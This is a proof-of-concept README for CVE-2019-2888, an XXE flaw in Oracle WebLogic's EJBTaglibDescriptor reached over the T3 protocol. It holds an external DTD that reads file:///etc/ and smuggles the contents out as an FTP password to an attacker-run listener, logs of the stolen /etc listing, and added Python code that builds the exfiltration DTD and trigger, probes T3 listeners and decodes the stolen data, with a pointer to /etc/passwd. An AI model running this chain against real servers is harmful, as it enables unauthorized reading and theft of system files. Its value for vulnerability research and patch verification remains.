
CVE-2019-2888 PoC: Oracle Fusion Middleware WebLogic Server component information disclosure vulnerability

Associated vulnerability
Title: Oracle Fusion Middleware WebLogic Server component information disclosure vulnerability (CVE-2019-2888)
Description: Oracle Fusion Middleware is Oracle's business innovation platform for enterprise and cloud environments; it provides middleware, software suites and related functionality. WebLogic Server is its application server component for cloud and traditional environments. The EJB Container component of WebLogic Server 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 in Oracle Fusion Middleware contains a security vulnerability. An attacker can exploit it to read data without authorization, affecting
Description
WebLogic EJBTaglibDescriptor XXE vulnerability (CVE-2019-2888)
Readme
# CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE vulnerability

![](./info.png)

![](./CVE-2019-2888.gif)

https://www.oracle.com/security-alerts/cpuoct2019.html

## fernflower.jar

`weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class`

```
╭─root@jas502n /var
╰─# find ./ |grep EJBTaglibDescriptor
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
```

```
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar
```

#### EJBTaglibDescriptor.class to EJBTaglibDescriptor.java
```
╭─root@jas502n /var 
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
INFO:  Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO:  ... done
╭─root@jas502n /var 
╰─# ls            
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar
```
#### cat EJBTaglibDescriptor.java
![](./EJBTaglibDescriptor.png)
```
╭─root@jas502n /var 
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
   private static final long serialVersionUID = -9016538269900747655L;
   private FilesystemInfoDescriptor fileInfo;
   private BeanDescriptor[] beans;
   private transient ClassLoader jarLoader;
   private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

   static void p(String var0) {
      System.err.println("[EJBTagDesc]: " + var0);
   }
```

The class is Externalizable, so its readExternal method runs as soon as a T3 message carrying one of these objects is deserialized, and the imports (DocumentBuilder, InputSource, StringReader, WebLogicDocumentBuilderFactory) indicate that this path hands an XML string to a DocumentBuilder. That parser is the one that resolves the external entities in the steps below.
## 0x01 Download the Python xxer tool

https://github.com/TheTwitchy/xxer

`info: Starting xxer_httpd on port 8989`

`info: Starting xxer_ftpd on port 2121`

`http://10.10.20.100:8989/ext.dtd`

![](./xxe_server.png)
```
╭─root@jas502n ~/xxer ‹master*›
╰─# python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>
```

#### Set file:///etc/ as the target resource in ext.dtd

```
<!ENTITY % bbb SYSTEM "file:///etc/"><!ENTITY % ccc "<!ENTITY &#37; ddd SYSTEM 'ftp://fakeuser:%bbb;@10.10.20.100:2121/b'>">
```

## 0x02 Send the serialized XML payload over the T3 protocol
![](t3_send_xxe.png)

```
ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001                                                 


 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/
                          /____/

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE vulnerability

                  python By jas502n



[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest: ~/Desktop/CVE-2019-2888#
```
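The capture above only shows the plaintext T3 hello going out and "HELO" coming back. The following added example (not the PoC's weblogic.py, and not part of the original README) performs that same hello and parses the reply, so a practitioner can tell whether the listener speaks T3 at all and which WebLogic version it reports before spending time on the serialized payload. The reply shape `HELO:<version>.false ...` is the usual one from real servers and is an assumption here; `SAMPLE_REPLY` is constructed, and `LISTED_AFFECTED` is simply the version list from the advisory text at the top of the page.

```python
"""T3 hello exchange that precedes the serialized payload in step 0x02.

Added example, not the PoC's weblogic.py. It sends the plaintext hello shown
in the capture and parses the listener's reply. The reply format
(HELO:<version>.false, then AS:/HL: lines) is assumed from real servers;
the page itself only shows that "HELO" came back.
"""
import re
import socket
from typing import Optional

# Versions named in the advisory text at the top of the page.
LISTED_AFFECTED = ("10.3.6.0.0", "12.1.3.0.0", "12.2.1.3.0")

# Constructed sample reply (assumed shape, not captured from the page).
SAMPLE_REPLY = b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\n\n"


def build_t3_hello(version: str = "12.2.1", peer: str = "us-l-breens", port: int = 7001) -> bytes:
    """Plaintext hello as in the capture: header lines, then an empty line."""
    lines = [
        f"t3 {version}",           # protocol and client version claimed
        "AS:255",                  # abbreviation table size
        "HL:19",                   # header length
        "MS:10000000",             # max message size the client accepts
        f"PU:t3://{peer}:{port}",  # peer URL; any name is accepted
        "",
        "",
    ]
    return "\n".join(lines).encode()


def parse_t3_reply(data: bytes) -> Optional[str]:
    """Return the version reported in a HELO reply ("" when HELO carries no
    parseable version), or None when the listener refused T3 (no HELO at all,
    e.g. a filtered channel or a LGIN/denial message)."""
    first = data.decode("latin-1", "replace").split("\n", 1)[0].strip()
    if not first.startswith("HELO"):
        return None
    m = re.match(r"HELO:(\d+(?:\.\d+)+)", first)
    return m.group(1) if m else ""


def is_listed_affected(version: str) -> bool:
    """True when the reported version is one the advisory names.

    A listed version does not prove the October 2019 CPU patch is missing:
    the HELO line carries the release, not the patch-set level."""
    return version in LISTED_AFFECTED


def t3_probe(host: str, port: int = 7001, timeout: float = 5.0) -> Optional[str]:
    """Network variant of the exchange; returns what parse_t3_reply returns."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_t3_hello(port=port))
        return parse_t3_reply(s.recv(1024))


if __name__ == "__main__":
    import sys
    if len(sys.argv) >= 2:
        target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
        print(t3_probe(sys.argv[1], target_port))
    else:
        print(parse_t3_reply(SAMPLE_REPLY))
```

Run it with a host and port to probe a live listener; with no arguments it parses the constructed sample. A None result means the hello was refused, which is the case to check first when the serialized payload later seems to do nothing.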

## 0x03 Retrieve the /etc directory listing
![](./get_etc_dir.png)

```
root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>


10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version
```
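The DTD chain set up in 0x01 and the FTP-side listing recovered in 0x03 are two halves of one blind (out-of-band) XXE channel. The added example below is not code from the PoC or from xxer: it rebuilds the ext.dtd and trigger document that xxer served in the captures, with comments on why the nested entity is written with `&#37;` and why the data leaves over FTP rather than HTTP, and it decodes the exfiltrated lines from the FTP control channel a listener like xxer logs. The host and port values are the ones from the page; `SAMPLE_FTP_LOG` is constructed, and the commands after PASS (`TYPE`, `PASV`, `RETR`) are assumed client behaviour that the page does not show. The function names are this example's own.

```python
"""Blind XXE chain of step 0x01 and FTP-side recovery of step 0x03.

Added example, not code from the PoC or from xxer. It rebuilds the DTD and
trigger document the captures show and decodes the exfiltrated data from the
FTP control-channel lines a listener records. The sample FTP log below is
constructed; the post-login FTP verbs are assumed client behaviour.
"""
from typing import Iterable, List, Tuple


def build_external_dtd(listener_host: str, ftp_port: int, resource: str) -> str:
    """External DTD fetched over HTTP by the victim's parser.

    %bbb  reads the local resource (a file or, as here, a directory listing).
    %ccc  holds the *declaration* of %ddd as text. Its '%' is written &#37;
          because a literal '%' inside an entity value is expanded while the
          DTD is read, before %ccc is ever referenced.
    %ddd  once declared and referenced, makes the parser open an FTP URL whose
          password is the content of %bbb, so the data leaves in PASS.
    FTP is used instead of HTTP because Java's HTTP URL handling rejects a
    newline in the URL, while the FTP client writes the credential, newlines
    included, to the control channel (newer JDKs reject CR/LF there as well,
    which limits this channel to single-line content on such targets).
    """
    return (
        f'<!ENTITY % bbb SYSTEM "{resource}">'
        f'<!ENTITY % ccc "<!ENTITY &#37; ddd SYSTEM '
        f"'ftp://fakeuser:%bbb;@{listener_host}:{ftp_port}/b'>\">"
    )


def build_trigger_document(listener_host: str, http_port: int) -> str:
    """Inline XML that pulls the DTD and dereferences the three entities in order."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        "<!DOCTYPE xmlrootname ["
        f'<!ENTITY % aaa SYSTEM "http://{listener_host}:{http_port}/ext.dtd">'
        "%aaa;%ccc;%ddd;]>"
    )


# Verbs a stock FTP client sends once the login is complete (assumed). A
# content line that starts with one of these would be misread as the end of
# the data, which is why xxer just logs every line and the listing is read by eye.
_POST_LOGIN_VERBS = {"TYPE", "CWD", "PASV", "EPSV", "PORT", "EPRT", "RETR",
                     "QUIT", "SYST", "PWD", "NOOP"}


def decode_ftp_exfil(control_lines: Iterable[str]) -> Tuple[str, List[str]]:
    """Recover (username, content lines) from FTP control-channel lines.

    The first content line arrives as the argument of PASS; because the
    password itself contains newlines, every further line of the resource is
    received as a bare 'command' until the client resumes real FTP traffic.
    """
    user = ""
    content: List[str] = []
    in_password = False
    for raw in control_lines:
        line = raw.rstrip("\r\n")
        if not in_password:
            if line[:5].upper() == "USER ":
                user = line[5:]
            elif line[:5].upper() == "PASS ":
                content.append(line[5:])
                in_password = True
            continue
        if line.split(" ", 1)[0].upper() in _POST_LOGIN_VERBS:
            break
        content.append(line)
    return user, content


# Constructed FTP log in the style of the xxer capture above: the first lines
# mirror what the page shows, the trailing commands are assumed client traffic.
SAMPLE_FTP_LOG = [
    "USER fakeuser",
    "PASS .pwd.lock",
    "adduser.conf",
    "alternatives",
    "apparmor",
    "apparmor.d",
    "apt",
    "TYPE I",
    "PASV",
    "RETR b",
]


if __name__ == "__main__":
    print(build_external_dtd("10.10.20.100", 2121, "file:///etc/"))
    print(build_trigger_document("10.10.20.166", 8989))
    print(decode_ftp_exfil(SAMPLE_FTP_LOG))
```

Change `resource` to a file path such as `file:///etc/passwd` to pull file contents instead of a directory listing; content that contains characters that terminate or break the userinfo part of a URL (for example `@`, `/` or `#`) will arrive truncated or not at all, which is a limitation of the channel rather than of the target.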

## References

https://github.com/NickstaDB/SerializationDumper

https://github.com/TheTwitchy/xxer

https://github.com/21superman/weblogic_cve-2019-2890

https://paper.seebug.org/1067/

https://www.oracle.com/security-alerts/cpuoct2019.html

File snapshot

```
/data/pocs/72dbabbc35b6f62e59ebe01985141b7cbe8e19bd
├── [ 14M] CVE-2019-2888.gif
├── [ 13K] EJBTaglibDescriptor.java
├── [570K] EJBTaglibDescriptor.png
├── [194K] get_etc_dir.png
├── [ 40K] info.png
├── [6.1K] README.md
├── [131K] t3_send_xxe.png
├── [8.5K] weblogic.py
└── [ 95K] xxe_server.png

0 directories, 9 files
```